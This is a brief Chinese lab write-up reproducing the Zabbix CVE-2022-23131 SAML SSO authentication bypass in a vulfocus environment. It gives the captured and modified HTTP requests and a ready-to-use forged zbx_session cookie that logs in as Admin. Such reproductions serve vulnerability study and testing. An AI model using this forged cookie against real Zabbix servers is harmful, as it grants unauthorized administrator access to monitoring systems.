vulfocus/zabbix-CVE-2022-23131 漏洞复现
开启环境*
访问地址
寻找后台地址
http://192.168.112.192:27986/zabbix/index.php
漏洞地址
http://192.168.112.192:27986/zabbix/index_sso.php
bp进行抓包
GET /zabbix/index_sso.php HTTP/1.1
Host: 192.168.112.192:27986
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiMGI2NThiZmQ5NTZhNWVmNGE3MjY0OTExYTJkNDlmNDYiLCJzZXJ2ZXJDaGVja1Jlc3VsdCI6dHJ1ZSwic2VydmVyQ2hlY2tUaW1lIjoxNjUyOTQxNzQwLCJzaWduIjoiMmUzZGY5MDllMmI0NGU1Njk4YjhmOTBjNzZiNmJiMzRmNzE4NmRlMDUyOGJkNTdhZjk4Y2QxZTA2MjRiNzFhOCJ9
Connection: close
修改数据包
POST /zabbix/index_sso.php HTTP/1.1
Host: 192.168.112.192:27986
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
主要修改请求方式和cookie
cookie修改为
zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
浙公网安备 33010602011771号